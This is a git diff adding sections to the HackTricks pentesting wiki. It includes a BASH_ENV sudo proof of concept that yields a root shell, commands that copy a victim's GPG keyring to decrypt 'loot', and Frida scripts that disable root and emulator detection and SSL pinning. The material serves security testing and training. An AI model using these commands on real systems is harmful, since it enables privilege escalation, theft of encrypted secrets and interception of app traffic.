Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

Author: carlospolop

src/SUMMARY.md

@@ -447,6 +447,7 @@
   - [NextJS](network-services-pentesting/pentesting-web/nextjs.md)
   - [Nginx](network-services-pentesting/pentesting-web/nginx.md)
   - [NodeJS Express](network-services-pentesting/pentesting-web/nodejs-express.md)
+  - [Sitecore](network-services-pentesting/pentesting-web/sitecore/README.md)
   - [PHP Tricks](network-services-pentesting/pentesting-web/php-tricks-esp/README.md)
     - [PHP - Useful Functions & disable_functions/open_basedir bypass](network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md)
       - [disable_functions bypass - php-fpm/FastCGI](network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md)
@@ -493,6 +494,7 @@
 - [135, 593 - Pentesting MSRPC](network-services-pentesting/135-pentesting-msrpc.md)
 - [137,138,139 - Pentesting NetBios](network-services-pentesting/137-138-139-pentesting-netbios.md)
 - [139,445 - Pentesting SMB](network-services-pentesting/pentesting-smb/README.md)
+  - [Ksmbd Attack Surface And Fuzzing Syzkaller](network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md)
   - [rpcclient enumeration](network-services-pentesting/pentesting-smb/rpcclient-enumeration.md)
 - [143,993 - Pentesting IMAP](network-services-pentesting/pentesting-imap.md)
 - [161,162,10161,10162/udp - Pentesting SNMP](network-services-pentesting/pentesting-snmp/README.md)
@@ -929,4 +931,3 @@
 - [Post Exploitation](todo/post-exploitation.md)
 - [Investment Terms](todo/investment-terms.md)
 - [Cookies Policy](todo/cookies-policy.md)
-  

src/linux-hardening/linux-post-exploitation/README.md

@@ -53,6 +53,33 @@ The Pluggable Authentication Module (PAM) is a system used under Linux for user
 > [!TIP]
 > You can automate this process with [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)
 
-{{#include ../../banners/hacktricks-training.md}}
+## Decrypting GPG loot via homedir relocation
+
+If you find an encrypted `.gpg` file and a user’s `~/.gnupg` folder (pubring, private-keys, trustdb) but you can’t decrypt due to GnuPG homedir permissions/locks, copy the keyring to a writable location and use it as your GPG home.
+
+Typical errors you’ll see without this: "unsafe ownership on homedir", "failed to create temporary file", or "decryption failed: No secret key" (because GPG can’t read/write the original homedir).
 
+Workflow:
+
+```bash
+# 1) Stage a writable homedir and copy the victim's keyring
+mkdir -p /dev/shm/fakehome/.gnupg
+cp -r /home/victim/.gnupg/* /dev/shm/fakehome/.gnupg/
+# 2) Ensure ownership & perms are sane for gnupg
+chown -R $(id -u):$(id -g) /dev/shm/fakehome/.gnupg
+chmod 700 /dev/shm/fakehome/.gnupg
+# 3) Decrypt using the relocated homedir (either flag works)
+GNUPGHOME=/dev/shm/fakehome/.gnupg gpg -d /home/victim/backup/secrets.gpg
+# or
+gpg --homedir /dev/shm/fakehome/.gnupg -d /home/victim/backup/secrets.gpg
+```
 
+If the secret key material is present in `private-keys-v1.d`, GPG will unlock and decrypt without prompting for a passphrase (or it will prompt if the key is protected).
+
+
+## References
+
+- [0xdf – HTB Environment (GPG homedir relocation to decrypt loot)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
+- [GnuPG Manual – Home directory and GNUPGHOME](https://www.gnupg.org/documentation/manuals/gnupg/GPG-Configuration-Options.html#index-homedir)
+
+{{#include ../../banners/hacktricks-training.md}}

src/linux-hardening/privilege-escalation/README.md

@@ -886,6 +886,33 @@ This example, **based on HTB machine Admirer**, was **vulnerable** to **PYTHONPA
 sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
 ```
 
+### BASH_ENV preserved via sudo env_keep → root shell
+
+If sudoers preserves `BASH_ENV` (e.g., `Defaults env_keep+="ENV BASH_ENV"`), you can leverage Bash’s non-interactive startup behavior to run arbitrary code as root when invoking an allowed command.
+
+- Why it works: For non-interactive shells, Bash evaluates `$BASH_ENV` and sources that file before running the target script. Many sudo rules allow running a script or a shell wrapper. If `BASH_ENV` is preserved by sudo, your file is sourced with root privileges.
+
+- Requirements:
+  - A sudo rule you can run (any target that invokes `/bin/bash` non-interactively, or any bash script).
+  - `BASH_ENV` present in `env_keep` (check with `sudo -l`).
+
+- PoC:
+
+```bash
+cat > /dev/shm/shell.sh <<'EOF'
+#!/bin/bash
+/bin/bash
+EOF
+chmod +x /dev/shm/shell.sh
+BASH_ENV=/dev/shm/shell.sh sudo /usr/bin/systeminfo   # or any permitted script/binary that triggers bash
+# You should now have a root shell
+```
+
+- Hardening:
+  - Remove `BASH_ENV` (and `ENV`) from `env_keep`, prefer `env_reset`.
+  - Avoid shell wrappers for sudo-allowed commands; use minimal binaries.
+  - Consider sudo I/O logging and alerting when preserved env vars are used.
+
 ### Sudo execution bypassing paths
 
 **Jump** to read other files or use **symlinks**. For example in sudoers file: _hacker10 ALL= (root) /bin/less /var/log/\*_
@@ -1707,6 +1734,7 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
 - [https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)
 - [https://www.linode.com/docs/guides/what-is-systemd/](https://www.linode.com/docs/guides/what-is-systemd/)
 - [0xdf – HTB Eureka (bash arithmetic injection via logs, overall chain)](https://0xdf.gitlab.io/2025/08/30/htb-eureka.html)
-- [GNU Bash Reference Manual – Shell Arithmetic](https://www.gnu.org/software/bash/manual/bash.html#Shell-Arithmetic)
+- [GNU Bash Manual – BASH_ENV (non-interactive startup file)](https://www.gnu.org/software/bash/manual/bash.html#index-BASH_005fENV)
+- [0xdf – HTB Environment (sudo env_keep BASH_ENV → root)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
 
 {{#include ../../banners/hacktricks-training.md}}

src/mobile-pentesting/android-app-pentesting/README.md

@@ -291,6 +291,14 @@ You need to activate the **debugging** options and it will be cool if you can **
 > Once you have installed the application, the first thing you should do is to try it and investigate what does it do, how does it work and get comfortable with it.\
 > I will suggest to **perform this initial dynamic analysis using MobSF dynamic analysis + pidcat**, so we will be able to **learn how the application works** while MobSF **captures** a lot of **interesting** **data** you can review later on.
 
+Magisk/Zygisk quick notes (recommended on Pixel devices)
+- Patch boot.img with the Magisk app and flash via fastboot to get systemless root
+- Enable Zygisk + DenyList for root hiding; consider LSPosed/Shamiko when stronger hiding is required
+- Keep original boot.img to recover from OTA updates; re-patch after each OTA
+- For screen mirroring, use scrcpy on the host
+
+
+
 ### Unintended Data Leakage
 
 **Logging**
@@ -858,6 +866,7 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th
 - [SSLPinDetect: Advanced SSL Pinning Detection for Android Security Analysis](https://petruknisme.medium.com/sslpindetect-advanced-ssl-pinning-detection-for-android-security-analysis-1390e9eca097)
 - [SSLPinDetect GitHub](https://github.com/aancw/SSLPinDetect)
 - [smali-sslpin-patterns](https://github.com/aancw/smali-sslpin-patterns)
+- [Build a Repeatable Android Bug Bounty Lab: Emulator vs Magisk, Burp, Frida, and Medusa](https://www.yeswehack.com/learn-bug-bounty/android-lab-mobile-hacking-tools)
 
 ## Yet to try
 

src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md

@@ -41,6 +41,25 @@ These typically stub Java root/debug checks, process/service scans, and native p
 
 - Codeshare: https://codeshare.frida.re/
 
+## Automate with Medusa (Frida framework)
+
+Medusa provides 90+ ready-made modules for SSL unpinning, root/emulator detection bypass, HTTP comms logging, crypto key interception, and more.
+
+```bash
+git clone https://github.com/Ch0pin/medusa
+cd medusa
+pip install -r requirements.txt
+python medusa.py
+
+# Example interactive workflow
+show categories
+use http_communications/multiple_unpinner
+use root_detection/universal_root_detection_bypass
+run com.target.app
+```
+
+Tip: Medusa is great for quick wins before writing custom hooks. You can also cherry-pick modules and combine them with your own scripts.
+
 ## Step 3 — Bypass init-time detectors by attaching late
 
 Many detections only run during process spawn/onCreate(). Spawn‑time injection (-f) or gadgets get caught; attaching after UI loads can slip past.
@@ -104,6 +123,14 @@ Java.perform(() => {
 });
 ```
 
+// Quick root detection stub example (adapt to target package/class names)
+Java.perform(() => {
+  try {
+    const RootChecker = Java.use('com.target.security.RootCheck');
+    RootChecker.isDeviceRooted.implementation = function () { return false; };
+  } catch (e) {}
+});
+
 Log and neuter suspicious methods to confirm execution flow:
 
 ```js
@@ -116,6 +143,48 @@ Java.perform(() => {
 });
 ```
 
+## Bypass emulator/VM detection (Java stubs)
+
+Common heuristics: Build.FINGERPRINT/MODEL/MANUFACTURER/HARDWARE containing generic/goldfish/ranchu/sdk; QEMU artifacts like /dev/qemu_pipe, /dev/socket/qemud; default MAC 02:00:00:00:00:00; 10.0.2.x NAT; missing telephony/sensors.
+
+Quick spoof of Build fields:
+```js
+Java.perform(function(){
+  var Build = Java.use('android.os.Build');
+  Build.MODEL.value = 'Pixel 7 Pro';
+  Build.MANUFACTURER.value = 'Google';
+  Build.BRAND.value = 'google';
+  Build.FINGERPRINT.value = 'google/panther/panther:14/UP1A.231105.003/1234567:user/release-keys';
+});
+```
+
+Complement with stubs for file existence checks and identifiers (TelephonyManager.getDeviceId/SubscriberId, WifiInfo.getMacAddress, SensorManager.getSensorList) to return realistic values.
+
+## SSL pinning bypass quick hook (Java)
+
+Neutralize custom TrustManagers and force permissive SSL contexts:
+```js
+Java.perform(function(){
+  var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
+  var SSLContext = Java.use('javax.net.ssl.SSLContext');
+
+  // No-op validations
+  X509TrustManager.checkClientTrusted.implementation = function(){ };
+  X509TrustManager.checkServerTrusted.implementation = function(){ };
+
+  // Force permissive TrustManagers
+  var TrustManagers = [ X509TrustManager.$new() ];
+  var SSLContextInit = SSLContext.init.overload('[Ljavax.net.ssl.KeyManager;','[Ljavax.net.ssl.TrustManager;','java.security.SecureRandom');
+  SSLContextInit.implementation = function(km, tm, sr){
+    return SSLContextInit.call(this, km, TrustManagers, sr);
+  };
+});
+```
+
+Notes
+- Extend for OkHttp: hook okhttp3.CertificatePinner and HostnameVerifier as needed, or use a universal unpinning script from CodeShare.
+- Run example: `frida -U -f com.target.app -l ssl-bypass.js --no-pause`
+
 ## Step 6 — Follow the JNI/native trail when Java hooks fail
 
 Trace JNI entry points to locate native loaders and detection init:
@@ -165,6 +234,8 @@ Notes:
 - Requires apktool; ensure a current version from the official guide to avoid build issues: https://apktool.org/docs/install
 - Gadget injection enables instrumentation without root but can still be caught by stronger init‑time checks.
 
+Optionally, add LSPosed modules and Shamiko for stronger root hiding in Zygisk environments, and curate DenyList to cover child processes.
+
 References:
 - Objection: https://github.com/sensepost/objection
 
@@ -226,5 +297,7 @@ apk-mitm app.apk
 - [r2frida](https://github.com/nowsecure/r2frida)
 - [Apktool install guide](https://apktool.org/docs/install)
 - [Magisk](https://github.com/topjohnwu/Magisk)
+- [Medusa (Android Frida framework)](https://github.com/Ch0pin/medusa)
+- [Build a Repeatable Android Bug Bounty Lab: Emulator vs Magisk, Burp, Frida, and Medusa](https://www.yeswehack.com/learn-bug-bounty/android-lab-mobile-hacking-tools)
 
 {{#include ../../banners/hacktricks-training.md}}

src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md

@@ -208,6 +208,59 @@ However there are **a lot of different command line useful options** that you ca
 - `-screen {touch(default)|multi-touch|o-touch}` : Set emulated touch screen mode.
 - **`-writable-system`** : Use this option to have a writable system image during your emulation session. You will need also to run `adb root; adb remount`. This is very useful to install a new certificate in the system.
 
+## Linux CLI setup (SDK/AVD quickstart)
+
+The official CLI tools make it easy to create fast, debuggable emulators without Android Studio.
+
+```bash
+# Directory layout
+mkdir -p ~/Android/cmdline-tools/latest
+
+# Download commandline tools (Linux)
+wget https://dl.google.com/android/repository/commandlinetools-linux-13114758_latest.zip -O /tmp/cmdline-tools.zip
+unzip /tmp/cmdline-tools.zip -d ~/Android/cmdline-tools/latest
+rm /tmp/cmdline-tools.zip
+
+# Env vars (add to ~/.bashrc or ~/.zshrc)
+export ANDROID_HOME=$HOME/Android
+export PATH=$ANDROID_HOME/cmdline-tools/latest/bin:$ANDROID_HOME/platform-tools:$ANDROID_HOME/emulator:$PATH
+
+# Install core SDK components
+sdkmanager --install "platform-tools" "emulator"
+
+# Install a debuggable x86_64 system image (Android 11 / API 30)
+sdkmanager --install "system-images;android-30;google_apis;x86_64"
+
+# Create an AVD and run it with a writable /system & snapshot name
+avdmanager create avd -n PixelRootX86 -k "system-images;android-30;google_apis;x86_64" -d "pixel"
+emulator -avd PixelRootX86 -writable-system -snapshot PixelRootX86_snap
+
+# Verify root (debuggable images allow `adb root`)
+adb root
+adb shell whoami  # expect: root
+```
+
+Notes
+- System image flavors: google_apis (debuggable, allows adb root), google_apis_playstore (not rootable), aosp/default (lightweight).
+- Build types: userdebug often allows `adb root` on debug-capable images. Play Store images are production builds and block root.
+- On x86_64 hosts, full-system ARM64 emulation is unsupported from API 28+. For Android 11+ use Google APIs/Play images that include per-app ARM-to-x86 translation to run many ARM-only apps quickly.
+
+### Snapshots from CLI
+
+```bash
+# Save a clean snapshot from the running emulator
+adb -s emulator-5554 emu avd snapshot save my_clean_setup
+
+# Boot from a named snapshot (if it exists)
+emulator -avd PixelRootX86 -writable-system -snapshot my_clean_setup
+```
+
+## ARM→x86 binary translation (Android 11+)
+
+Google APIs and Play Store images on Android 11+ can translate ARM app binaries per process while keeping the rest of the system native x86/x86_64. This is often fast enough to test many ARM-only apps on desktop.
+
+> Tip: Prefer Google APIs x86/x86_64 images during pentests. Play images are convenient but block `adb root`; use them only when you specifically require Play services and accept the lack of root.
+
 ## Rooting a Play Store device
 
 If you downloaded a device with Play Store you are not going to be able to get root directly, and you will get this error message
@@ -236,6 +289,12 @@ You can **use the GUI** to take a snapshot of the VM at any time:
 
 ![](<../../images/image (234).png>)
 
+## References
+
+- [Build a Repeatable Android Bug Bounty Lab: Emulator vs Magisk, Burp, Frida, and Medusa](https://www.yeswehack.com/learn-bug-bounty/android-lab-mobile-hacking-tools)
+- [Android Emulator command line](https://developer.android.com/studio/run/emulator-commandline)
+- [Run ARM apps on the Android Emulator (x86 translation)](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)
+
 {{#include ../../banners/hacktricks-training.md}}
 
 

src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md

@@ -26,6 +26,64 @@ frida-ps -U #List packages and processes
 frida-ps -U | grep -i <part_of_the_package_name> #Get all the package name
 ```
 
+## Frida server vs. Gadget (root vs. no-root)
+
+Two common ways to instrument Android apps with Frida:
+
+- Frida server (rooted devices): Push and run a native daemon that lets you attach to any process.
+- Frida Gadget (no root): Bundle Frida as a shared library inside the APK and auto-load it within the target process.
+
+Frida server (rooted)
+
+```bash
+# Download the matching frida-server binary for your device's arch
+# https://github.com/frida/frida/releases
+adb root
+adb push frida-server-<ver>-android-<arch> /data/local/tmp/frida-server
+adb shell chmod 755 /data/local/tmp/frida-server
+adb shell /data/local/tmp/frida-server &    # run at boot via init/magisk if desired
+
+# From host, list processes and attach
+frida-ps -Uai
+frida -U -n com.example.app
+```
+
+Frida Gadget (no-root)
+
+1) Unpack the APK, add the gadget .so and config:
+- Place libfrida-gadget.so into lib/<abi>/ (e.g., lib/arm64-v8a/)
+- Create assets/frida-gadget.config with your script loading settings
+
+Example frida-gadget.config
+```json
+{
+  "interaction": { "type": "script", "path": "/sdcard/ssl-bypass.js" },
+  "runtime": { "logFile": "/sdcard/frida-gadget.log" }
+}
+```
+
+2) Reference/load the gadget so it’s initialized early:
+- Easiest: Add a small Java stub to System.loadLibrary("frida-gadget") in Application.onCreate(), or use native lib loading already present.
+
+3) Repack and sign the APK, then install:
+```bash
+apktool d app.apk -o app_m
+# ... add gadget .so and config ...
+apktool b app_m -o app_gadget.apk
+uber-apk-signer -a app_gadget.apk -o out_signed
+adb install -r out_signed/app_gadget-aligned-debugSigned.apk
+```
+
+4) Attach from host to the gadget process:
+```bash
+frida-ps -Uai
+frida -U -n com.example.app
+```
+
+Notes
+- Gadget is detected by some protections; keep names/paths stealthy and load late/conditionally if needed.
+- On hardened apps, prefer rooted testing with server + late attach, or combine with Magisk/Zygisk hiding.
+
 ## Tutorials
 
 ### [Tutorial 1](frida-tutorial-1.md)
@@ -202,6 +260,12 @@ Java.choose("com.example.a11x256.frida_test.my_activity", {
 - [Part 1 of Advanced Frida Usage blog series: IOS Encryption Libraries](https://8ksec.io/advanced-frida-usage-part-1-ios-encryption-libraries-8ksec-blogs/)
 
 
+## References
+
+- [Build a Repeatable Android Bug Bounty Lab: Emulator vs Magisk, Burp, Frida, and Medusa](https://www.yeswehack.com/learn-bug-bounty/android-lab-mobile-hacking-tools)
+- [Frida Gadget documentation](https://frida.re/docs/gadget/)
+- [Frida releases (server binaries)](https://github.com/frida/frida/releases)
+
 {{#include ../../../banners/hacktricks-training.md}}